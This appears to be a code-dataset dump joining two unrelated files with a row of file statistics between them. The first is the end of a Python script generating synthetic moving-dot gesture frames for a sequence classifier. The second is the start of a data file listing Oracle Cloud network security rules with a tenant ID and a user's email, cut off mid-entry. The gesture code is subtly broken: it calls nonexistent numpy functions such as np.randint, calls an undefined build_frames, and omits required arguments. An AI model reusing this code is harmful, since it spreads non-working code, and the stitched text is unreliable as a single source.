yy = y[i] / 100 * (size - 1) * yratio + zratio
x2.append(xx)
y2.append(yy)
# frame = np.zeros((size, size))
for xx, yy in zip(x2, y2):
frame = np.zeros((size, size))
# frame = frame.copy()
frame[math.floor(yy), math.floor(xx)] = 1
frames.append(frame)
# f = pyplot.figure(figsize=(5, 5))
# create a grayscale subplot for each frame
'''ax = f.add_subplot(1, 1, 1)
ax.imshow(frame, cmap='Greys')
ax.get_xaxis().set_visible(False)
ax.get_yaxis().set_visible(False)
pyplot.show()'''
'''if type == 1:
for i in range(0, size - len(x2)):
frame = np.zeros((size, size), dtype=int)
frames.append(frame)'''
return frames, labelA
def GestureC(size, period=100, type=0):
frames = list()
labelA = list()
amplify = np.random.randint(5, 10) / 10.0
xratio = 2
yratio = 1
R = 50
zratio = size - yratio * size # rang(0,size - yratio* size)
if type == 1 or type == 2:
xratio = np.random.randint(3, 5) # rang(1,5)
yratio = np.random.randint(1, 10) / 10.0 # rang(0.1,1,0.1)
zratio = np.random.randint(0, size - yratio * size) # rang(0,size - yratio* size)
R = np.random.randint(40, 50)
labelA.append('GestureC')
x = list()
y = list()
for i in range(0, period):
x1 = R * np.cos(2 * pi * i / period) + R
y1 = R * np.sin(2 * pi * i / period) + R
x.append(x1)
y.append(y1)
x2 = list()
y2 = list()
for i in range(0, period, xratio):
# print(x[i], y[i])
xx = x[i] / 100 * (size - 1)
yy = y[i] / 100 * (size - 1) * yratio + zratio
x2.append(xx)
y2.append(yy)
# frame = np.zeros((size, size))
for xx, yy in zip(x2, y2):
# frame = frame.copy()
frame = np.zeros((size, size))
frame[math.floor(yy), math.floor(xx)] = 1
frames.append(frame)
# f = pyplot.figure(figsize=(5, 5))
# create a grayscale subplot for each frame
'''ax = f.add_subplot(1, 1, 1)
ax.imshow(frame, cmap='Greys')
ax.get_xaxis().set_visible(False)
ax.get_yaxis().set_visible(False)
pyplot.show()'''
'''if type == 1:
for i in range(0, size - len(x2)):
frame = np.zeros((size, size), dtype=int)
frames.append(frame)'''
return frames, labelA
def GestureD(size, period=100, type=0):
frames = list()
labelA = list()
amplify = np.random.randint(5, 10) / 10.0
xratio = 2 # range(1,5)
yratio = 1 # rang(0.1,1.0.1)
A = 100
P = 25
zratio = size - yratio * size # rang(0,size - yratio* size)
if type == 1 or type == 2:
xratio = np.random.randint(3, 5) # rang(1,5)
yratio = np.random.randint(1, 10) / 10.0 # rang(0.1,1,0.1)
zratio = np.random.randint(0, size - yratio * size) # rang(0,size - yratio* size)
labelA.append('GestureD')
x = list()
y = list()
for i in range(0, period):
x1 = i
y1 = (A / P) * (P - abs(i % (2 * P) - P))
x.append(x1)
y.append(y1)
x2 = list()
y2 = list()
for i in range(0, period, xratio):
# print(x[i], y[i])
xx = x[i] / 100 * (size - 1)
yy = y[i] / 100 * (size - 1) * yratio + zratio
x2.append(xx)
y2.append(yy)
# frame = np.zeros((size, size))
for xx, yy in zip(x2, y2):
# frame = frame.copy()
frame = np.zeros((size, size))
frame[math.floor(xx), math.floor(yy)] = 1
frames.append(frame.T)
# f = pyplot.figure(figsize=(5, 5))
# create a grayscale subplot for each frame
'''ax = f.add_subplot(1, 1, 1)
ax.imshow(frame.T, cmap='Greys')
ax.get_xaxis().set_visible(False)
ax.get_yaxis().set_visible(False)
pyplot.show()'''
'''if type == 1:
for i in range(0, size - len(x2)):
frame = np.zeros((size, size), dtype=int)
frames.append(frame)'''
return frames, labelA
def GestureBackground(size, period=5, type=0):
frames = list()
labelA = list()
labelA.append('Background')
for _ in range(0, period):
frame = np.zeros((size, size))
frames.append(frame.T)
return frames, labelA
'''
def GenNailLeftDuration(size):
frames = list()
labelA = list()
frame = np.zeros((size, size))
step = np.randint(0, size - 1)
# decide if we are heading left or right
right = 1 if np.random() < 0.5 else 0
col = 0 if right else size - 1
frame[step, col] = 0
frames.append(frame)
amplify = np.randint(5, 10) / 10.0
xratio = np.randint(1, 4)
yratio = np.randint(1, 4)
duration = np.randint(5, 10) / 10
labelA.append('NailWashLeft')
for i in range(1, size):
i = i / float(size)
column, row = generate_sinDuration(duration, i, amplify=amplify)
frame = np.zeros((size, size))
frame, step = next_frameSin(int(row * size / xratio), frame, int(column * size / yratio))
frames.append(frame)
# labelA.append('NailWashLeft')
# drawImage(frame)
return frames, labelA
def GenNailRight(size):
frames = list()
labelA = list()
frame = np.zeros((size, size))
frames.append(frame)
amplify = np.randint(5, 20) / 10.0
xratio = np.randint(1, 4)
yratio = np.randint(1, 4)
labelA.append('NailWashRight')
for i in range(1, size):
i = i / float(size)
column, row = generate_DampedSin(0.5, i, 3, amplify=amplify)
# frame = np.zeros((size, size))
frame, step = next_frameDampedSin(int(row * size / xratio), frame, int(column * size / yratio))
frames.append(frame)
# labelA.append('NailWashRight')
return frames, labelA
def GenNailRightDuration(size):
frames = list()
labelA = list()
frame = np.zeros((size, size))
frames.append(frame)
amplify = np.randint(5, 20) / 10.0
xratio = np.randint(1, 4)
yratio = np.randint(1, 4)
duration = np.randint(3, 8) / 10
labelA.append('NailWashRight')
for i in range(1, size):
i = i / float(size)
column, row = generate_DampedSinDuration(duration, i, 3, amplify=amplify)
frame = np.zeros((size, size))
frame, step = next_frameDampedSin(int(row * size / xratio), frame, int(column * size / yratio))
frames.append(frame)
# labelA.append('NailWashRight')
# drawImage(frame)
return frames, labelA
def GenThumbFinger(size):
frames = list()
labelA = list()
frame = np.zeros((size, size))
frames.append(frame)
radius = np.randint(5, 7) / 10
xratio = np.randint(1, 3)
yratio = np.randint(1, 3)
x0 = np.randint(2, 3) / 10
y0 = np.randint(2, 3) / 10
labelA.append('ThumbFingureWash')
for i in range(1, size):
i = float(i) / float(size)
column, row = generate_circle(1, i, 0.5, radius=radius, x0=x0, y0=y0)
# frame = np.zeros((size, size))
frame, step = next_frameDampedCircle(int(row * size / xratio), frame, int(column * size / yratio))
frames.append(frame)
# labelA.append('ThumbFingureWash')
return frames, labelA
def GenThumbFingerDuration(size):
frames = list()
labelA = list()
frame = np.zeros((size, size))
frames.append(frame)
radius = np.randint(5, 7) / 10
xratio = np.randint(1, 3)
yratio = np.randint(1, 3)
x0 = np.randint(2, 3) / 10
y0 = np.randint(2, 3) / 10
duration = np.randint(3, 10) / 10
labelA.append('ThumbFingureWash')
for i in range(1, size):
i = float(i) / float(size)
column, row = generate_circleDuration(duration, i, 0.5, radius=radius, x0=x0, y0=y0)
frame = np.zeros((size, size))
frame, step = next_frameDampedCircle(int(row * size / xratio), frame, int(column * size / yratio))
frames.append(frame)
# labelA.append('ThumbFingureWash')
# drawImage(frame)
return frames, labelA
def GenForeFinger(size):
frames = list()
labelA = list()
frame = np.zeros((size, size))
frames.append(frame)
radius = np.randint(5, 7) / 10
xratio = np.randint(1, 3)
yratio = np.randint(1, 3)
labelA.append('ForeFingureWash')
for i in range(1, size):
i = float(i) / float(size)
column, row = generate_Heart(1, i, 0.5)
# frame = np.zeros((size, size))
frame, step = next_frameDampedHeart(int(row * size / xratio), frame, int(column * size / yratio))
frames.append(frame)
# labelA.append('ForeFingureWash')
return frames, labelA
def GenForeFingerDuration(size):
frames = list()
labelA = list()
frame = np.zeros((size, size))
frames.append(frame)
radius = np.randint(5, 7) / 10
xratio = np.randint(1, 3)
yratio = np.randint(1, 3)
duration = np.randint(3, 10) / 10
labelA.append('ForeFingureWash')
for i in range(1, size):
i = float(i) / float(size)
column, row = generate_HeartDuration(duration, i, 0.5)
frame = np.zeros((size, size))
frame, step = next_frameDampedHeart(int(row * size / xratio), frame, int(column * size / yratio))
frames.append(frame)
# labelA.append('ForeFingureWash')
# drawImage(frame)
return frames, labelA
# generate a sequence of frames of a dot moving across an image
def build_frames2(size, timeStep=0):
frames = list()
labelA = list()
labelB = list()
labelC = list()
# create the first frame
fa, la = GenForeFinger()
frames += fa
labelA += la
fa, la = GenNailLeft()
frames += fa
labelA += la
fa, la = GenNailRight()
frames += fa
labelA += la
fa, la = GenThumbFinger()
frames += fa
labelA += la
return frames, labelA
'''
# generate a sequence of frames of a dot moving across an image
def build_frames_DB_A(size, timeStep=0, shuff=False):
frames = list()
labelA = list()
labelB = list()
labelC = list()
my_list = [GestureA, GestureB, GestureC, GestureD]
res = [0, 1, 2, 3]
if shuff:
random.shuffle(res)
for i in res:
fa, la = my_list[res[i]](period=80, size=size)
frames += fa
labelA += la
fat = list()
lat = list()
if size - len(fa) > 0:
fa, la = GestureBackground(size, period=size - len(fa))
frames += fa
labelA += la
return frames, labelA
def build_frames_DB_B(size, timeStep=0, shuff=False):
frames = list()
labelA = list()
labelB = list()
labelC = list()
my_list = [GestureA, GestureB, GestureC, GestureD]
res = [0, 1, 2, 3]
if shuff:
random.shuffle(res)
for i in res:
fat = list()
lat = list()
fa, la = my_list[res[i]](size, type=1)
frames += fa
labelA += la
if size - len(fa) > 0:
fa, la = GestureBackground(size, period=size - len(fa))
frames += fa
labelA += la
return frames, labelA
def build_frames_DB_C(size, timeStep=0, shuff=False):
frames = list()
labelA = list()
labelB = list()
labelC = list()
fat = list()
lat = list()
my_list = [GestureA, GestureB, GestureC, GestureD]
res = [0, 1, 2, 3]
if shuff:
random.shuffle(res)
for index, i in enumerate(res):
fa, la = my_list[res[i]](size, type=2)
frames += fa
labelA += la
if index != 3:
fa, la = GestureBackground(size, period=5)
frames += fa
labelA += la
if size * 4 - len(frames) > 0:
fa, la = GestureBackground(size, period=size * 4 - len(frames))
frames += fa
labelA += la
return frames, labelA
def build_frames_DB_D(size, timeStep=0, shuff=False):
frames = list()
labelA = list()
labelB = list()
labelC = list()
my_list = [GestureA, GestureB, GestureC, GestureD]
res = [0, 1, 2, 3]
if shuff:
random.shuffle(res)
for i in res:
fa, la = my_list[res[i]](size, type=2)
frames += fa
labelA += la
return frames, labelA
# generate a sequence of frames of a dot moving across an image
def build_framesRandomDuration(size, timeStep=0, shuff=False):
frames = list()
labelA = list()
labelB = list()
labelC = list()
my_list = [GenNailLeftDuration, GenNailRightDuration, GenThumbFingerDuration, GenForeFingerDuration]
res = [0, 1, 2, 3]
if shuff:
np.rand.shuffle(res)
for i in res:
fa, la = my_list[res[i]](size)
frames += fa
labelA += la
return frames, labelA
def validateData():
# generate sequence of frames
size = 30
frames, right = build_frames(size)
# plot all feames
'''
f=pyplot.figure(figsize=(5,5))
for seq in range(4):
for i in range((size ) ):
# create a grayscale subplot for each frame
ax=f.add_subplot(1, (size +1) * 4 , (size +1) * seq +i +1)
ax.imshow(frames[(size ) * seq +i], cmap='Greys')
# turn of the scale to make it cleaer
#ax = pyplot.gca()
ax.get_xaxis().set_visible(False)
ax.get_yaxis().set_visible(False)
# show the plot
pyplot.show()
pyplot.savefig('fig.png')
'''
f, ax = pyplot.subplots(2, (size + 1) * 4, figsize=((size + 1) * 4, 20), sharey=True)
# make a little extra space between the subplots
f.subplots_adjust(hspace=0.5)
# ax[0, 0].set_title("Image A", fontsize=15)
for i in range((size + 1) * 4):
ax[1, i].set_axis_off()
for row in range(0, 1):
for seq in range(4):
for i in range((size)):
ax[row, (size + 1) * seq + i].imshow(frames[(size) * seq + i], cmap='Greys')
ax[row, (size + 1) * seq + i].set_axis_off()
ax[row, (size + 1) * seq + i + 1].set_axis_off()
# pyplot.show()
# pyplot.savefig('fig.png')
# generate multiple sequences of frames and reshape for network input
def generate_examples(size, n_patterns):
X, y = list(), list()
for i in range(n_patterns):
# print("gen{}/{}".format(i,n_patterns))
frames, labels = build_frames(size)
code = np.array(labels)
label_encoder = LabelEncoder()
vec = label_encoder.fit_transform(code)
X.append(frames)
y.append(vec)
# resize as [samples, timesteps, width, height, channels]
X = np.array(X).reshape(n_patterns, size * 4, size, size, 1)
y = np.array(y).reshape(n_patterns, 4)
labels = to_categorical(y, 4)
return X, labels
# generate multiple sequences of frames and reshape for network input
def generate_sample(size, n_patterns, parameter=None):
X, y = list(), list()
for i in range(n_patterns):
# print("gen{}/{}".format(i,n_patterns))
frames, labels = build_frames2(size)
code = np.array(labels)
label_encoder = LabelEncoder()
vec = label_encoder.fit_transform(code)
X.append(frames)
y.append(vec)
# resize as [samples, timesteps, width, height, channels]
X = np.array(X).reshape(n_patterns, len(X[0]), size, size, 1)
y = np.array(y).reshape(n_patterns, 4)
labels = to_categorical(y, 4)
return X, labels
# generate multiple sequences of frames and reshape for network input
def generate_DB_A(size, n_patterns, parameter=None):
X, y = list(), list()
for i in range(n_patterns):
print("gen{}/{}".format(i, n_patterns))
frames, labels = build_frames_DB_A(size=size, shuff=parameter['shuff'][0])
code = np.array(labels)
label_encoder = LabelEncoder()
vec = label_encoder.fit_transform(code)
X.append(frames)
y.append(vec)
# resize as [samples, timesteps, width, height, channels]
#XX = np.array(X)
#XX.shape = (n_patterns, len(X[0]), size, size, 1)
X = np.array(X).reshape(n_patterns, len(X[0]), size, size, 1)
# y = np.array(y).reshape(n_patterns, 8)
labels = to_categorical(y, 5)
return X, labels
# generate multiple sequences of frames and reshape for network input
def generate_DB_B(size, n_patterns, parameter=None):
X, y = list(), list()
for i in range(n_patterns):
print("gen{}/{}".format(i,n_patterns))
frames, labels = build_frames_DB_B(size, shuff=parameter['shuff'][0])
code = np.array(labels)
label_encoder = LabelEncoder()
vec = label_encoder.fit_transform(code)
X.append(frames)
y.append(vec)
# resize as [samples, timesteps, width, height, channels]
X = np.array(X).reshape(n_patterns, len(X[0]), size, size, 1)
# y = np.array(y).reshape(n_patterns, 8)
labels = to_categorical(y, 5)
return X, labels
# generate multiple sequences of frames and reshape for network input
def generate_DB_C(size, n_patterns, parameter=None):
X, y = list(), list()
for i in range(n_patterns):
print("gen{}/{}".format(i,n_patterns))
frames, labels = build_frames_DB_C(size, shuff=parameter['shuff'][0])
code = np.array(labels)
label_encoder = LabelEncoder()
vec = label_encoder.fit_transform(code)
X.append(frames)
y.append(vec)
# resize as [samples, timesteps, width, height, channels]
X = np.array(X).reshape(n_patterns, len(X[0]), size, size, 1)
# y = np.array(y).reshape(n_patterns, 8)
labels = to_categorical(y, 5)
return X, labels
def generate_DB_D(size, n_patterns, parameter=None):
X, y = list(), list()
for i in range(n_patterns):
print("gen{}/{}".format(i,n_patterns))
frames, labels = build_frames_DB_D(size, shuff=parameter['shuff'][0])
code = np.array(labels)
label_encoder = LabelEncoder()
vec = label_encoder.fit_transform(code)
X.append(frames)
y.append(vec)
# resize as [samples, timesteps, width, height, channels]
X = np.array(X).reshape(n_patterns, len(X[0]), size, size, 1)
# y = np.array(y).reshape(n_patterns, 8)
labels = to_categorical(y, 5)
return X, labels
| 30.022989 | 106 | 0.565371 | 4,621 | 31,344 | 3.781865 | 0.059295 | 0.028325 | 0.013046 | 0.032044 | 0.880922 | 0.869879 | 0.838808 | 0.828279 | 0.814202 | 0.811685 | 0 | 0.041382 | 0.286083 | 31,344 | 1,043 | 107 | 30.051774 | 0.739599 | 0.121427 | 0 | 0.773214 | 0 | 0 | 0.007862 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058929 | false | 0 | 0.0125 | 0.003571 | 0.135714 | 0.007143 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c956022f624960842aaf2da3d2d94c1a1f94f375 | 90,546 | py | Python | gc3_query/var/scratchpad/beta_01/security_rules_data.py | ericmharris/gc3-query | 0bf5226130aafbb1974aeb96d93ee1996833e87d | [
"MIT"
] | null | null | null | gc3_query/var/scratchpad/beta_01/security_rules_data.py | ericmharris/gc3-query | 0bf5226130aafbb1974aeb96d93ee1996833e87d | [
"MIT"
] | null | null | null | gc3_query/var/scratchpad/beta_01/security_rules_data.py | ericmharris/gc3-query | 0bf5226130aafbb1974aeb96d93ee1996833e87d | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
#@Filename : security_rules_data
#@Date : [8/8/2018 12:15 PM]
#@Poject: gc3-query
#@AUTHOR : emharris
~~~~~~~~~~~~~~~~
<DESCR SHORT>
<DESCR>
"""
################################################################################
## Standard Library Imports
################################################################################
## Third-Party Imports
################################################################################
## Project Imports
from gc3_query.lib import get_logging
_debug, _info, _warning, _error, _critical = get_logging(name=__name__)
secrules = [{'name': '/Compute-587626604/default/egress',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/default/egress',
'description': 'Default egress Network Security Rule', 'tags': [], 'acl': '/Compute-587626604/default',
'flowDirection': 'egress', 'srcVnicSet': '/Compute-587626604/default', 'dstVnicSet': None, 'srcIpAddressPrefixSets': [],
'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_p2admin_ahttps',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_p2admin_ahttps',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_acl_default',
'flowDirection': 'ingress', 'srcVnicSet': None,
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_admin',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ahttps'], 'enabledFlag': False},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/sys_infra2wls_admin_ssh',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/sys_infra2wls_admin_ssh',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_acl_default',
'flowDirection': 'ingress', 'srcVnicSet': None,
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_wls_infraadmin',
'srcIpAddressPrefixSets': ['/oracle/public/paas-infra'], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ssh'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ora_otd_infraadmin_ingress_self',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ora_otd_infraadmin_ingress_self',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ora_otd_infraadmin',
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ora_otd_infraadmin',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_db_ingress_self',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_db_ingress_self',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_db',
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_db', 'srcIpAddressPrefixSets': [],
'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True}, {'name': '/Compute-587626604/default/ingress',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/default/ingress',
'description': 'Default ingress Network Security Rule',
'tags': [], 'acl': '/Compute-587626604/default',
'flowDirection': 'ingress',
'srcVnicSet': '/Compute-587626604/default',
'dstVnicSet': '/Compute-587626604/default',
'srcIpAddressPrefixSets': [],
'dstIpAddressPrefixSets': [], 'secProtocols': [],
'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_wls2db_dbport',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_wls2db_dbport',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_ms',
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_db', 'srcIpAddressPrefixSets': [],
'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/dbport'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_p2ms_chttp',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_p2ms_chttp',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_acl_default',
'flowDirection': 'ingress', 'srcVnicSet': None,
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_ms',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/chttp'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ora_p2otd_ssh',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ora_p2otd_ssh',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': None, 'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ora_otd',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ssh'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_wls_infraadmin_egress_all',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_wls_infraadmin_egress_all',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_acl_default', 'flowDirection': 'egress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_wls_infraadmin',
'dstVnicSet': None, 'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_wls_infraadmin_ingress_self',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_wls_infraadmin_ingress_self',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_acl_default',
'flowDirection': 'ingress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_wls_infraadmin',
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_wls_infraadmin',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ora_otd_ingress_self',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ora_otd_ingress_self',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ora_acl_default',
'flowDirection': 'ingress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ora_otd',
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ora_otd',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ora_otd_egress_all',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ora_otd_egress_all',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ora_acl_default',
'flowDirection': 'egress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ora_otd', 'dstVnicSet': None,
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/sys_infra2otd_admin_ssh',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/sys_infra2otd_admin_ssh',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ora_acl_default',
'flowDirection': 'ingress', 'srcVnicSet': None,
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ora_otd_infraadmin',
'srcIpAddressPrefixSets': ['/oracle/public/paas-infra'], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ssh'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ora_otd_infraadmin_ingress_self',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ora_otd_infraadmin_ingress_self',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ora_acl_default',
'flowDirection': 'ingress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ora_otd_infraadmin',
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ora_otd_infraadmin',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_p2_httpssl',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_p2_httpssl',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': None, 'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_db',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/httpssl'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_db_egress_all',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_db_egress_all',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_acl_default', 'flowDirection': 'egress',
